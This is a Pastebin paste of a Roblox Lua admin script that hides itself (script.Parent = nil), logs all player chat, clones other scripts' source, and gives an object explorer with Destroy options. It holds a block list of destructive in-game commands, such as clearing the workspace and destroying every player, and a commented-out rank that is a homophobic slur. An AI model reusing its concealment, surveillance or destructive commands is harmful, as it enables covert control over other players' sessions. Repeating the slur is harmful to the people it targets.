Advertisement
iiWolfie

Untitled

Apr 28th, 2016
261
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 186.58 KB | None | 0 0
  1. wait()
  2. script.Parent = nil
  3. script:ClearAllChildren()
  4. LuaVersion = _VERSION --<<<-- +|Thanks to Roblox Wiki|+
  5. Abort = false ;
  6. UsersTablets = [[iiChiIIy]] --<<<-<<<-<<< PUT UR NAME HERE
  7. Sources = {
  8. Source = 1,
  9. source = 1,
  10. DSource = 1,};
  11. Tablets = {}
  12. Fences = {}
  13. Jails = {}
  14. BackUp = script:Clone()
  15. Ranked = {}
  16. TabChange = false
  17. LockedScripts = false
  18. Ranked['Defaults'] = {['Rank'] = 0, ['Color'] = Color3.new(0,0,0),['InPri'] = false,['Desc'] = 'Guest'}
  19. DisconnectKey = "Disconnect"
  20. Key = "G_.DISCONNECT()"
  21. Removed = false
  22. GuiChat = false
  23. Commands = {}
  24. Ranks = {}
  25. NewRank = function(Rank,RankName)
  26. Ranks[Rank]=RankName
  27. end
  28.  
  29.  
  30.  
  31.  
  32. --[[+Ranks+]]--
  33. --NewRank(-4,'Fags')
  34. NewRank(-3,'Bums') -- Shutdown
  35. NewRank(-2,'nubs') -- Crashed
  36. NewRank(-1,'Banned') -- Kicked
  37. NewRank(-0.5,'Scum') -- A Nickname
  38. NewRank(0,'Guest')
  39. NewRank(1,'Admin')
  40. NewRank(2,'Super admin')
  41. NewRank(3,'Mega admin')
  42. NewRank(4,'Epic admin')
  43. NewRank(5,'User')
  44. NewRank(6,'Best Friend')
  45. NewRank(7,'Unlimited')
  46.  
  47. YourBet = "/"
  48. YourBet2 = "/"
  49. --[[+Chat Log+]]--
  50. local ChatLog = {}
  51. game:GetService("Players").ChildAdded:connect(function(p)
  52.    if not p:IsA("Player") then return end
  53.    p.Chatted:connect(function(m)
  54.        table.insert(ChatLog,{Speaker=p,Message=m})
  55.    end)
  56. end)
  57. --[[+Make Tablets+]]--
  58. MakeTablets=function()
  59. CurrentTabletPart = Instance.new('Part')
  60.        CurrentTabletPart.FormFactor = "Custom"
  61.        CurrentTabletPart.TopSurface = "Smooth"
  62.        CurrentTabletPart.BottomSurface = "Smooth"
  63.        CurrentTabletPart.Transparency = 0
  64.        CurrentTabletPart.Material = 'Ice'
  65.        CurrentTabletPart.Anchored = true
  66.        CurrentTabletPart.Locked = true
  67.        CurrentTabletPart.Shape = 'Ball'
  68.        CurrentTabletPart.CanCollide = false
  69.        CurrentTabletPart.Size = Vector3.new(3,3,3)
  70.        CurrentTabletPart:BreakJoints()
  71.  
  72. DifferentTablets = {}
  73. DifferentTablets['Tablet']= CurrentTabletPart:Clone()
  74.  
  75. DifferentTablets['Diamond'] = Instance.new('Part')
  76. Diamond = DifferentTablets['Diamond']
  77.    Diamond.FormFactor = "Custom"
  78.    Diamond.Size = Vector3.new(2.55,2.55,2.55)
  79.    Diamond.Transparency = 0
  80.    Diamond.CanCollide = false
  81.    Diamond.Anchored = true
  82. Mesh = Instance.new("SpecialMesh", Diamond)
  83.    Mesh.MeshType = "FileMesh"
  84.    Mesh.MeshId = "http://www.roblox.com/asset/?id=9756362"
  85.    Mesh.Scale = Diamond.Size
  86.  
  87. DifferentTablets['Tablet']=Instance.new('Part')
  88. Tablet = DifferentTablets['Tablet']
  89.    Tablet.FormFactor = "Custom"
  90.    Tablet.Size = Vector3.new(2.55,2.55,2.55)
  91.    Tablet.Transparency = 0
  92.    Tablet.CanCollide = false
  93.    Tablet.Anchored = true
  94. Mesh = Instance.new("SpecialMesh", Tablet)
  95.    Mesh.MeshType = "FileMesh"
  96.    Mesh.MeshId = "http://www.roblox.com/asset/?id=97689055"
  97.         Mesh.TextureId = "http://www.roblox.com/asset/?id=97689497"
  98.    Mesh.Scale = Tablet.Size
  99.  
  100. DifferentTablets['Dominus']=Instance.new('Part')
  101. Dominus = DifferentTablets['Dominus']
  102.    Dominus.FormFactor = "Custom"
  103.    Dominus.Size = Vector3.new(1.25,1.25,1.25)
  104.    Dominus.Transparency = 0
  105.    Dominus.CanCollide = false
  106.    Dominus.Anchored = true
  107. Mesh = Instance.new("SpecialMesh", Dominus)
  108.    Mesh.MeshType = "FileMesh"
  109.                         Mesh.TextureId = "http://www.roblox.com/asset/?id=83944043"
  110.                         Mesh.MeshId = "http://www.roblox.com/asset/?id=21057410"
  111.    Mesh.Scale = Dominus.Size
  112.  
  113. DifferentTablets['Spider']=Instance.new('Part')
  114. Spider = DifferentTablets['Spider']
  115.    Spider.FormFactor = "Custom"
  116.    Spider.Size = Vector3.new(1.25,1.25,1.25)
  117.    Spider.Transparency = 0
  118.    Spider.CanCollide = false
  119.    Spider.Anchored = true
  120. Mesh = Instance.new("SpecialMesh", Spider)
  121.    Mesh.MeshType = "FileMesh"
  122.               Mesh.TextureId = "http://www.roblox.com/asset/?id=64485392"
  123.         Mesh.MeshId = "http://www.roblox.com/asset/?id=64485380"
  124.    Mesh.Scale = Spider.Size
  125.  
  126. DifferentTablets['Earth']=Instance.new('Part')
  127. Earth = DifferentTablets['Earth']
  128.    Earth.FormFactor = "Custom"
  129.    Earth.Size = Vector3.new(3,3,3)
  130.    Earth.Transparency = 0
  131.    Earth.CanCollide = false
  132.    Earth.Anchored = true
  133. Mesh = Instance.new("SpecialMesh", Earth)
  134.    Mesh.MeshType = "FileMesh"
  135.         Mesh.TextureId = "http://www.roblox.com/asset/?id=10061209"
  136.         Mesh.MeshId = "http://www.roblox.com/asset/?id=10061232"
  137.    Mesh.Scale = Earth.Size
  138. DifferentTablets['Atom']=Instance.new('Part')
  139. Atom = DifferentTablets['Atom']
  140.    Atom.FormFactor = "Custom"
  141.    Atom.Size = Vector3.new(1.55,1.55,1.55)
  142.    Atom.Transparency = 0
  143.    Atom.CanCollide = false
  144.    Atom.Anchored = true
  145. Mesh = Instance.new("SpecialMesh", Atom)
  146.    Mesh.MeshType = "FileMesh"
  147.               Mesh.TextureId = "http://www.roblox.com/asset/?id=16171265"
  148.         Mesh.MeshId = "http://www.roblox.com/asset/?id=16171271"
  149.    Mesh.Scale = Atom.Size
  150.  
  151. DifferentTablets['Rock']=Instance.new('Part')
  152. Rock = DifferentTablets['Rock']
  153.    Rock.FormFactor = "Custom"
  154.    Rock.Size = Vector3.new(2.55,2.55,2.55)
  155.    Rock.Transparency = 0
  156.    Rock.CanCollide = false
  157.    Rock.Anchored = true
  158. Mesh = Instance.new("SpecialMesh", Rock)
  159.    Mesh.MeshType = "FileMesh"
  160.               Mesh.TextureId = "http://www.roblox.com/asset/?id=2861779"
  161.         Mesh.MeshId = "http://www.roblox.com/asset/?id=1290033"
  162.    Mesh.Scale = Rock.Size
  163.  
  164. DifferentTablets['Plate']=Instance.new('Part')
  165. Plate = DifferentTablets['Plate']
  166. Plate.Anchored=true
  167. Plate.Transparency = 0.7
  168. Plate.TopSurface = "Smooth"
  169. Plate.BottomSurface = "Smooth"
  170. Plate.Material = 'Plastic'
  171. Plate.CanCollide=false;
  172. Plate.FormFactor='Custom'
  173. Plate.Locked=true
  174. Plate.Size = Vector3.new(4, 0.3, 4)
  175.  
  176. DifferentTablets['Horus'] = Instance.new('Part')
  177. Horus = DifferentTablets['Horus']
  178.    Horus.FormFactor = "Custom"
  179.    Horus.Size = Vector3.new(1.25,1.25,1.25)
  180.    Horus.Transparency = 0
  181.    Horus.CanCollide = false
  182.    Horus.Anchored = true
  183. Mesh = Instance.new("SpecialMesh", Horus)
  184.    Mesh.MeshType = "FileMesh"
  185.    Mesh.MeshId = "http://www.roblox.com/asset/?id=21712738"
  186.         Mesh.TextureId = "http://www.roblox.com/asset/?id=102083848"
  187.    Mesh.Scale = Horus.Size
  188.  
  189. DifferentTablets['Ball']=Instance.new('Part')
  190. Dbal = DifferentTablets['Ball']
  191. Dbal.Size = Vector3.new(3,3,3)
  192. Dbal.Locked=true
  193. Dbal.Material = 'Ice'
  194. Dbal.Anchored=true;
  195. Dbal.Transparency = .75
  196. Dbal.CanCollide=false
  197. Dbal.Shape = 'Ball'
  198.  
  199. DifferentTablets['Cube']=Instance.new('Part')
  200. Cube= DifferentTablets.Cube
  201. Cube.Anchored,Cube.Locked,Cube.CanCollide,Cube.Size,Cube.Transparency=true,true,false,Vector3.new(3,3,3),0.7
  202. Cube.TopSurface = "Smooth"
  203. Cube.BottomSurface = "Smooth"
  204. end
  205. MakeTablets()
  206. LocalScript = nil
  207. Delay(0,function()
  208.    while wait() do
  209.        Source = game:findFirstChild('DSource',true) or game:findFirstChild('Source',true) or game:findFirstChild('source',true)
  210.        if Source then
  211.            local parent = Source.Parent
  212.            if parent:IsA('LocalScript') then
  213.                LocalScript=parent:Clone()
  214.            end
  215.        end
  216.    end
  217. end)
  218.        
  219. --[[+SOURCE+]]--
  220.         coroutine.wrap(function()
  221.                 local Source = script:FindFirstChild("Source") or script:FindFirstChild("DSource") or script:FindFirstChild("source") or nil  
  222.                 if Source ~= nil then
  223.                         Source = Source.Value
  224.                         for i = 1, #Source,100 do       wait()
  225.                                 local Val = Instance.new("StringValue",workspace)  
  226.                                 Val.Value = Source:sub(i*100, i*100+100)
  227.                                 game:service'Debris':AddItem(Val,60)
  228.                         end
  229.                 end
  230.         end)()
  231. --[[+Kicking Phrases+]]-- lol People being abusive these days
  232. KickingPhrases={'ban/all','workspace:ClearAllChildren()','ban/others','ban/z','ban;z','/ban z','ban:z',':ban z','ban\z','ban z','crash/z','crash;z','/crash z','crash:z',
  233.         'crash\z',':crash z','crash z','crash/others','crash/all',
  234.         'kick/z','kick;z','/kick z','kick:z',':kick z','kick\z','kick:others','ziv120:Kick()',
  235.         'kick z','kick/others','gtfo/z','gtfo;z','getridof','ban:others',':rep','CBA.'
  236.         ,'Camb'..'all.','jointInstance',"ziv120:Destroy","ziv120:Remove",'"ziv120'..'zi"',"'ziv".."z'",
  237.         "p = game.Players:GetPlayers() for i=1,#p do p[i]:Destroy() end",".Character = Workspace","game.Players:ClearAllChildren()"}
  238.  
  239.  
  240. Properties=
  241.    {
  242.    "AbsolutePosition",
  243.    "AbsoluteSize",
  244.    "AccountAge",
  245.    "AccountAgeReplicate",
  246.    "Active",
  247.    "Adornee",
  248.    "AllowAmbientOcclusion",
  249.    "AllowTeamChangeOnTouch",
  250.    "AluminumQuality",
  251.    "AlwaysOnTop",
  252.    "Ambient",
  253.    "AmbientReverb",
  254.    "Anchored",
  255.    "Angularvelocity",
  256.    "AnimationId",
  257.    "AppearanceDidLoad",
  258.    "AreHingesDetected",
  259.    "AttachmentForward",
  260.    "AttachmentPoint",
  261.    "AttachmentPos",
  262.    "AttachmentRight",
  263.    "AttachmentUp",
  264.    "AutoAssignable",
  265.    "AutoButtonColor",
  266.    "AutoColorCharacters",
  267.    "AvailablePhysicalMemory",
  268.    "Axes",
  269.    "BackgroundColor",
  270.    "BackgroundColor3",
  271.    "BackgroundTransparency",
  272.    "BaseTextureId",
  273.    "BaseUrl",
  274.    "Bevel",
  275.    "BevelRoundness",
  276.    "BinType",
  277.    "BlastPressure",
  278.    "BlastRadius",
  279.    "BodyColor",
  280.    "BodyPart",
  281.    "BorderColor",
  282.    "BorderColor3",
  283.    "BorderSizePixel",
  284.    "BrickColor",
  285.    "Brightness",
  286.    "Browsable",
  287.    "BubbleChat",
  288.    "BubbleChatLifetime",
  289.    "BubbleChatMaxBubbles",
  290.    "Bulge",
  291.    "Button1DownConnectionCount",
  292.    "Button1UpConnectionCount",
  293.    "Button2DownConnectionCount",
  294.    "Button2UpConnectionCount",
  295.    "C0",
  296.    "C1",
  297.    "CameraMode",
  298.    "CameraSubject",
  299.    "CameraType",
  300.    "CanBeDropped",
  301.    "CanCollide",
  302.    "CanLoadCharacterAppearance",
  303.    "CartoonFactor",
  304.    "CastShadows",
  305.    "CelestialBodiesShown",
  306.    "CFrame",
  307.    "Cframe",
  308.    "Character",
  309.    "CharacterAppearance",
  310.    "CharacterAutoLoads",
  311.    "ChatMode",
  312.    "ChatScrollLength",
  313.    "ClassicChat",
  314.    "ClearTextOnFocus",
  315.    "ClipsDescendants",
  316.    "CollisionSoundEnabled",
  317.    "CollisionSoundVolume",
  318.    "Color",
  319.    "ColorShift_Bottom",
  320.    "ColorShift_Top",
  321.    "ConstrainedValue",
  322.    "ControllingHumanoid",
  323.    "ControlMode",
  324.    "ConversationDistance",
  325.    "CoordinateFrame",
  326.    "CorrodedMetalQuality",
  327.    "CPU",
  328.    "CpuCount",
  329.    "CpuSpeed",
  330.    "CreatorId",
  331.    "CreatorType",
  332.    "CurrentAngle",
  333.    "CurrentCamera",
  334.    "CycleOffset",
  335.    "D",
  336.    "DataCap",
  337.    "DataComplexity",
  338.    "DataComplexityLimit",
  339.    "DataReady",
  340.    "Deprecated",
  341.    "DeselectedConnectionCount",
  342.    "DesiredAngle",
  343.    "DiamondPlateQuality",
  344.    "Disabled",
  345.    "DistanceFactor",
  346.    "DistributedGameTime",
  347.    "DopplerScale",
  348.    "Draggable",
  349.    "DraggingV1",
  350.    "Duration",
  351.    "EditorFont",
  352.    "EditorFontSize",
  353.    "EditorTabWidth",
  354.    "ElapsedTime",
  355.    "Elasticity",
  356.    "Enabled",
  357.    "ExplosionType",
  358.    "ExtentsOffset",
  359.    "F0",
  360.    "F1",
  361.    "F2",
  362.    "F3",
  363.    "Face",
  364.    "FaceId",
  365.    "Faces",
  366.    "FieldOfView",
  367.    "Focus",
  368.    "FogColor",
  369.    "FogEnd",
  370.    "FogStart",
  371.    "Font",
  372.    "FontSize",
  373.    "Force",
  374.    "FormFactor",
  375.    "Friction",
  376.    "From",
  377.    "GamepadEnabled",
  378.    "GearGenreSetting",
  379.    "Genre",
  380.    "GeographicLatitude",
  381.    "GfxCard",
  382.    "Graphic",
  383.    "GrassQuality",
  384.    "Grip",
  385.    "GripForward",
  386.    "GripPos",
  387.    "GripRight",
  388.    "GripUp",
  389.    "Guest",
  390.    "HasBuildTools",
  391.    "HeadsUpDisplay",
  392.    "Health",
  393.    "Heat",
  394.    "Hit",
  395.    "Humanoid",
  396.    "IceQuality",
  397.    "Icon",
  398.    "IdleConnectionCount",
  399.    "Image",
  400.    "InitialPrompt",
  401.    "InOut",
  402.    "Archivable",
  403.    "ClassName",
  404.    "DataCost",
  405.    "Name",
  406.    "Parent",
  407.    "InUse",
  408.    "IsModalDialog",
  409.    "IsPaused",
  410.    "IsPlaying",
  411.    "IsWindows",
  412.    "JobId",
  413.    "Jump",
  414.    "KeyboardEnabled",
  415.    "KeyDownConnectionCount",
  416.    "KeyUpConnectionCount",
  417.    "LeftLeg",
  418.    "LeftRight",
  419.    "LinkedSource",
  420.    "LocalPlayer",
  421.    "Location",
  422.    "Locked",
  423.    "Looped",
  424.    "Material",
  425.    "MaxActivationDistance",
  426.    "MaxCollisionSounds",
  427.    "MaxExtents",
  428.    "MaxForce",
  429.    "MaxHealth",
  430.    "MaxItems",
  431.    "MaxPlayers",
  432.    "MaxSpeed",
  433.    "MaxThrust",
  434.    "MaxTorque",
  435.    "MaxValue",
  436.    "MaxVelocity",
  437.    "MembershipType",
  438.    "MembershipTypeReplicate",
  439.    "MeshId",
  440.    "MeshType",
  441.    "MinValue",
  442.    "Modal",
  443.    "MouseButton1ClickConnectionCount",
  444.    "MouseButton1DownConnectionCount",
  445.    "MouseButton1UpConnectionCount",
  446.    "MouseButton2ClickConnectionCount",
  447.    "MouseButton2DownConnectionCount",
  448.    "MouseButton2UpConnectionCount",
  449.    "MouseDelta",
  450.    "MouseDragConnectionCount",
  451.    "MouseEnabled",
  452.    "MouseEnterConnectionCount",
  453.    "MouseHit",
  454.    "MouseLeaveConnectionCount",
  455.    "MouseLock",
  456.    "MouseMovedConnectionCount",
  457.    "MouseTarget",
  458.    "MouseTargetFilter",
  459.    "MouseTargetSurface",
  460.    "MoveConnectionCount",
  461.    "MoveState",
  462.    "MultiLine",
  463.    "NameOcclusion",
  464.    "NetworkOwner",
  465.    "Neutral",
  466.    "NumPlayers",
  467.    "Offset",
  468.    "Opacity",
  469.    "Origin",
  470.    "OsPlatform",
  471.    "OsVer",
  472.    "OverlayTextureId",
  473.    "P",
  474.    "PantsTemplate",
  475.    "ParamA",
  476.    "ParamB",
  477.    "Part",
  478.    "Part0",
  479.    "Part1",
  480.    "PersonalServerRank",
  481.    "Pitch",
  482.    "PixelShaderModel",
  483.    "PlaceId",
  484.    "PlasticQuality",
  485.    "PlatformStand",
  486.    "PlayCount",
  487.    "PlayerToHideFrom",
  488.    "PlayOnRemove",
  489.    "Point",
  490.    "Port",
  491.    "Position",
  492.    "Preliminary",
  493.    "PrimaryPart",
  494.    "Priority",
  495.    "PrivateWorkingSetBytes",
  496.    "Purpose",
  497.    "RAM",
  498.    "Reflectance",
  499.    "ReplicatedSelectedConnectionCount",
  500.    "ResizeableFaces",
  501.    "ResizeIncrement",
  502.    "Resolution",
  503.    "ResponseDialog",
  504.    "RightLeg",
  505.    "RiseVelocity",
  506.    "RobloxVersion",
  507.    "RolloffScale",
  508.    "RotVelocity",
  509.    "Scale",
  510.    "Score",
  511.    "ScriptsDisabled",
  512.    "SecondaryColor",
  513.    "Selected",
  514.    "ShadowColor",
  515.    "Shape",
  516.    "Shiny",
  517.    "ShirtTemplate",
  518.    "ShowDeprecatedObjects",
  519.    "ShowDevelopmentGui",
  520.    "ShowLegacyPlayerList",
  521.    "ShowPreliminaryObjects",
  522.    "Sides",
  523.    "Sit",
  524.    "Size",
  525.    "SizeConstraint",
  526.    "SizeOffset",
  527.    "SkinColor",
  528.    "SkyboxBk",
  529.    "SkyboxDn",
  530.    "SkyboxFt",
  531.    "SkyboxLf",
  532.    "SkyboxRt",
  533.    "SkyboxUp",
  534.    "SlateQuality",
  535.    "SoundId",
  536.    "Source",
  537.    "SparkleColor",
  538.    "SpecificGravity",
  539.    "Specular",
  540.    "StarCount",
  541.    "Steer",
  542.    "StickyWheels",
  543.    "StudsBetweenTextures",
  544.    "StudsOffset",
  545.    "StudsPerTileU",
  546.    "StudsPerTileV",
  547.    "Style",
  548.    "Summary",
  549.    "SuperSafeChatReplicate",
  550.    "Surface",
  551.    "Surface0",
  552.    "Surface1",
  553.    "SurfaceInput",
  554.    "Target",
  555.    "TargetFilter",
  556.    "TargetOffset",
  557.    "TargetPoint",
  558.    "TargetRadius",
  559.    "TargetSurface",
  560.    "TeamColor",
  561.    "Terrain",
  562.    "Text",
  563.    "TextBounds",
  564.    "TextColor",
  565.    "TextColor3",
  566.    "TextFits",
  567.    "TextScaled",
  568.    "TextStrokeColor3",
  569.    "TextStrokeTransparency",
  570.    "TextTransparency",
  571.    "Texture",
  572.    "TextureId",
  573.    "TextureSize",
  574.    "TextWrap",
  575.    "TextWrapped",
  576.    "TextXAlignment",
  577.    "TextYAlignment",
  578.    "Throttle",
  579.    "ThrustD",
  580.    "ThrustP",
  581.    "Ticket",
  582.    "Time",
  583.    "TimeOfDay",
  584.    "To",
  585.    "Tone",
  586.    "ToolTip",
  587.    "TopBottom",
  588.    "Torque",
  589.    "Torso",
  590.    "TouchEnabled",
  591.    "Transparency",
  592.    "TrussDetail",
  593.    "TurnD",
  594.    "TurnP",
  595.    "TurnSpeed",
  596.    "UnitRay",
  597.    "UseLuaChat",
  598.    "UserDialog",
  599.    "UserId",
  600.    "Value",
  601.    "Velocity",
  602.    "Version",
  603.    "VertexColor",
  604.    "VideoCaptureEnabled",
  605.    "VideoMemory",
  606.    "VideoQuality",
  607.    "ViewSizeX",
  608.    "ViewSizeY",
  609.    "Visible",
  610.    "Volume",
  611.    "WalkDirection",
  612.    "WalkSpeed",
  613.    "WalkToPart",
  614.    "WalkToPoint",
  615.    "WheelBackwardConnectionCount",
  616.    "WheelForwardConnectionCount",
  617.    "WireRadius",
  618.    "WoodQuality",
  619.    "X",
  620.    "Y",
  621.    "ZIndex"
  622.    }
  623. GetProperties = function(Parent)
  624. local Out = {}
  625. for _, props in pairs(Properties) do
  626. local Ran, Error = coroutine.resume(coroutine.create(function() Parent[props] = Parent[props] end))
  627. if not Error then
  628. table.insert(Out, props)
  629. end
  630. end
  631. return Out
  632. end
  633.  
  634. rename=function(Item,Player,CurrentName)
  635. RemoveTablets(Player)
  636. Done=false
  637. Str=CurrentName
  638. Caps=false
  639. if CurrentName==Item.Name then Str="" end
  640.    
  641.  
  642.    Alphabet = {
  643.    "a",    "b",    "c",    "d",    "e",    "f",    "g",    "h",    "i",    "j",    "k",    "l",    "m",    "n",    "o",    "p",    "q",    "r",    "s",    "t",    "u",    "v",    "w",    "x",    "y",    "z"
  644.    }
  645. Output('Current Rename Name : ' .. Str,'Green',Player)
  646. Output('Letters : ' ..tostring(#Str),'Red',Player)
  647. Output('Switch to caps','Green',Player,nil,function() RemoveTablets(Player) for _,v in pairs(Alphabet) do Output(string.upper(v),'Orange',Player,nil,function() Str=Str..string.upper(v) rename(Item,Player,Str) end ) end end)
  648. Output('Stop renaming','Red',Player,nil,function() Done=true RemoveTablets(Player) Output(Item.Name .. "'s new name is: " .. Str,'Green',Player) Item.Name=CurrentName end)
  649. for _,Letter in pairs(Alphabet) do
  650.    Output(Letter,'Orange',Player,nil,function() Str= Str..Letter RemoveTablets(Player) rename(Item,Player,Str) end )
  651. end
  652. Output('Space','Orange',Player,nil,function() Str=Str..' ' RemoveTablets(Player) rename(Item,Player,Str) end )
  653. Output('Go back one','Red',Player,nil,function() Str = Str:sub(1,#Str-1) RemoveTablets(Player) rename(Item,Player,Str) end )
  654. end
  655. --[[+Get Time+]]--
  656. function GetTime()
  657. local hour = math.floor((tick()%86400)/60/60) local min = math.floor(((tick()%86400)/60/60-hour)*60)
  658. if min < 10 then min = "0"..min end
  659. return hour..":"..min
  660. end
  661. nillog = {}
  662. ----[[+Log+]]----
  663. loggit = function(msg)
  664. table.insert(nillog, GetTime()..' - '..msg)
  665. end
  666. loggit('')
  667. --[[+Explorer+]]--
  668. function Explore(Area,Speaker)
  669.    pcall(function()
  670.        RemoveTablets(Speaker)
  671.        local Color = Ranked[Speaker.Name].Color
  672.        if Area == Services or Area == nil then
  673.            for _,v in pairs(Services) do
  674.                              local      radius = 250
  675.                Output(v.className.."\t("..#v:children()..")",Color,Speaker,nil,
  676.                    function()
  677.                        Explore(v,Speaker)
  678.                    end
  679.                )
  680.            end
  681.            Output("Dismiss","Red",Speaker)
  682.        else
  683.            for i,v in pairs(Area:children()) do
  684.                local Name = false
  685.                pcall(function() v:children() Name = true end)
  686.                if Name == true then
  687.                    Name = v.Name
  688.                else
  689.                    Name = "Unknown Exception "..tostring(i)
  690.                end
  691.                Output(Name,Color,Speaker,nil,
  692.                    function()
  693.                        RemoveTablets(Speaker)
  694.                        Output("Name:\t"..v.Name,Color,Speaker)
  695.                        Output("Class:\t"..v.className,Color,Speaker)
  696.                        Output("Full Name:\t"..v:GetFullName(),Color,Speaker)
  697.                        Output("Destroy","Red",Speaker,nil,function() v:Destroy() Explore(v.Parent,Speaker) end)
  698.                        Output("#REDIRECT Parent","Blue",Speaker,nil,function() Explore(v.Parent.Parent,Speaker) end)
  699.                         Output("#REDIRECT Children","Blue",Speaker,nil,function() Explore(v,Speaker) end)
  700.                         Output('Clear all children','Red',Speaker,nil,function() v:ClearAllChildren() end)
  701.                         Output('Rename','Red',Speaker,nil,function() RemoveTablets(Speaker) rename(v,Speaker,v.Name) end )
  702.                         Output("Dismiss","Red",Speaker)
  703.                         local Properties=GetProperties(v)
  704.                         for _,p in pairs(Properties) do
  705.                             Output(tostring(p) .. ': ' .. tostring(v[p]),Color,Speaker)
  706.                         end
  707.                     end
  708.                 )
  709.             end
  710.             Output("Dismiss","Red",Speaker)
  711.         end
  712.     end)
  713. end
  714.  
  715. --[[+Extras+]]--
  716. -- All the colors
  717. Colors = {
  718. ["Light blue"] =  Color3.new(0.705882, 0.823529, 0.894118);
  719. ["Royal purple"] =  Color3.new(0.384314, 0.145098, 0.819608);
  720. ["Dark orange"] =  Color3.new(0.627451, 0.372549, 0.207843);
  721. ["Lig. yellowish green"] =  Color3.new(0.85098, 0.894118, 0.654902);
  722. ["Light grey"] =  Color3.new(0.780392, 0.756863, 0.717647);
  723. ["Yellow flip/flop"] =  Color3.new(0.705882, 0.517647, 0.333333);
  724. ["Light bluish violet"] =  Color3.new(0.756863, 0.792157, 0.870588);
  725. ["Tr. Flu. Yellow"] =  Color3.new(1, 0.964706, 0.482353);
  726. ["Earth blue"] =  Color3.new(0.12549, 0.227451, 0.337255);
  727. ["Grey"] =  Color3.new(0.631373, 0.647059, 0.635294);
  728. ["Tr. Medi. reddish violet"] =  Color3.new(0.894118, 0.678431, 0.784314);
  729. ["Medium Royal blue"] =  Color3.new(0.423529, 0.505882, 0.717647);
  730. ["Light orange brown"] =  Color3.new(0.796079, 0.517647, 0.258824);
  731. ["Dark Curry"] =  Color3.new(0.690196, 0.556863, 0.266667);
  732. ["Medium green"] =  Color3.new(0.631373, 0.768628, 0.54902);
  733. ["Sand green"] =  Color3.new(0.470588, 0.564706, 0.509804);
  734. ["Tr. Flu. Blue"] =  Color3.new(0.811765, 0.886275, 0.968628);
  735. ["Neongreen"] =  Color3.new(0.847059, 0.866667, 0.337255);
  736. ["Light lilac"] =  Color3.new(0.654902, 0.662745, 0.807843);
  737. ["Lime green"] =  Color3.new(0, 1, 0);
  738. ["Light red"] =  Color3.new(0.933333, 0.768628, 0.713726);
  739. ["Camo"] =  Color3.new(0.227451, 0.490196, 0.0823529);
  740. ["Turquoise"] =  Color3.new(0.47451, 0.709804, 0.709804);
  741. ["Light yellow"] =  Color3.new(0.976471, 0.913726, 0.6);
  742. ["Sand yellow"] =  Color3.new(0.584314, 0.541176, 0.45098);
  743. ["Light orange"] =  Color3.new(0.917647, 0.721569, 0.572549);
  744. ["Lilac"] =  Color3.new(0.419608, 0.384314, 0.607843);
  745. ["Bright blue"] =  Color3.new(0.0509804, 0.411765, 0.67451);
  746. ["Black metallic"] =  Color3.new(0.0862745, 0.113725, 0.196078);
  747. ["Tr. Flu. Red"] =  Color3.new(0.882353, 0.643137, 0.760784);
  748. ["Pastel orange"] =  Color3.new(1, 0.788235, 0.788235);
  749. ["Medium bluish violet"] =  Color3.new(0.407843, 0.454902, 0.67451);
  750. ["Navy blue"] =  Color3.new(0, 0.12549, 0.376471);
  751. ["Sand red"] =  Color3.new(0.584314, 0.47451, 0.466667);
  752. ["Olive"] =  Color3.new(0.756863, 0.745098, 0.258824);
  753. ["Curry"] =  Color3.new(0.843137, 0.662745, 0.294118);
  754. ["Medium red"] =  Color3.new(0.854902, 0.52549, 0.478431);
  755. ["Bright orange"] =  Color3.new(0.854902, 0.521569, 0.254902);
  756. ["Earth orange"] =  Color3.new(0.384314, 0.278431, 0.196078);
  757. ["Reddish brown"] =  Color3.new(0.411765, 0.25098, 0.156863);
  758. ["Sand violet metallic"] =  Color3.new(0.584314, 0.556863, 0.639216);
  759. ["Tr. Lg blue"] =  Color3.new(0.756863, 0.87451, 0.941177);
  760. ["Tr. Yellow"] =  Color3.new(0.968628, 0.945098, 0.552941);
  761. ["Bright reddish lilac"] =  Color3.new(0.556863, 0.258824, 0.521569);
  762. ["Tr. Flu. Green"] =  Color3.new(0.972549, 0.945098, 0.517647);
  763. ["Light bluish green"] =  Color3.new(0.717647, 0.843137, 0.835294);
  764. ["Brown"] =  Color3.new(0.486275, 0.360784, 0.27451);
  765. ["Neon orange"] =  Color3.new(0.835294, 0.45098, 0.239216);
  766. ["Really red"] =  Color3.new(1, 0, 0);
  767. ["Teal"] =  Color3.new(0.0705882, 0.933333, 0.831373);
  768. ["Warm yellowish orange"] =  Color3.new(0.921569, 0.721569, 0.498039);
  769. ["Tr. Flu. Reddish orange"] =  Color3.new(0.85098, 0.521569, 0.423529);
  770. ["Dark red"] =  Color3.new(0.482353, 0.180392, 0.184314);
  771. ["White"] =  Color3.new(0.94902, 0.952941, 0.952941);
  772. ["Pastel violet"] =  Color3.new(0.694118, 0.654902, 1);
  773. ["Silver flip/flop"] =  Color3.new(0.537255, 0.529412, 0.533333);
  774. ["Dark green"] =  Color3.new(0.156863, 0.498039, 0.278431);
  775. ["Br. yellowish orange"] =  Color3.new(0.886275, 0.607843, 0.25098);
  776. ["Medium orange"] =  Color3.new(0.878431, 0.596078, 0.392157);
  777. ["Bright red"] =  Color3.new(0.768628, 0.156863, 0.109804);
  778. ["Med. bluish green"] =  Color3.new(0.333333, 0.647059, 0.686275);
  779. ["Flame yellowish orange"] =  Color3.new(0.909804, 0.670588, 0.176471);
  780. ["Lig. Yellowich orange"] =  Color3.new(0.952941, 0.811765, 0.607843);
  781. ["Dark stone grey"] =  Color3.new(0.388235, 0.372549, 0.384314);
  782. ["Grime"] =  Color3.new(0.498039, 0.556863, 0.392157);
  783. ["Red flip/flop"] =  Color3.new(0.592157, 0.411765, 0.356863);
  784. ["Sand blue"] =  Color3.new(0.454902, 0.52549, 0.615686);
  785. ["Light grey metallic"] =  Color3.new(0.670588, 0.678431, 0.67451);
  786. ["Tr. Green"] =  Color3.new(0.517647, 0.713726, 0.552941);
  787. ["Bright purple"] =  Color3.new(0.803922, 0.384314, 0.596078);
  788. ["Sand blue metallic"] =  Color3.new(0.47451, 0.533333, 0.631373);
  789. ["Tr. Red"] =  Color3.new(0.803922, 0.329412, 0.294118);
  790. ["Bright reddish violet"] =  Color3.new(0.572549, 0.223529, 0.470588);
  791. ["Med. yellowish green"] =  Color3.new(0.780392, 0.823529, 0.235294);
  792. ["Light stone grey"] =  Color3.new(0.898039, 0.894118, 0.87451);
  793. ["Lemon metalic"] =  Color3.new(0.509804, 0.541176, 0.364706);
  794. ["Black"] =  Color3.new(0.105882, 0.164706, 0.207843);
  795. ["Dark grey"] =  Color3.new(0.427451, 0.431373, 0.423529);
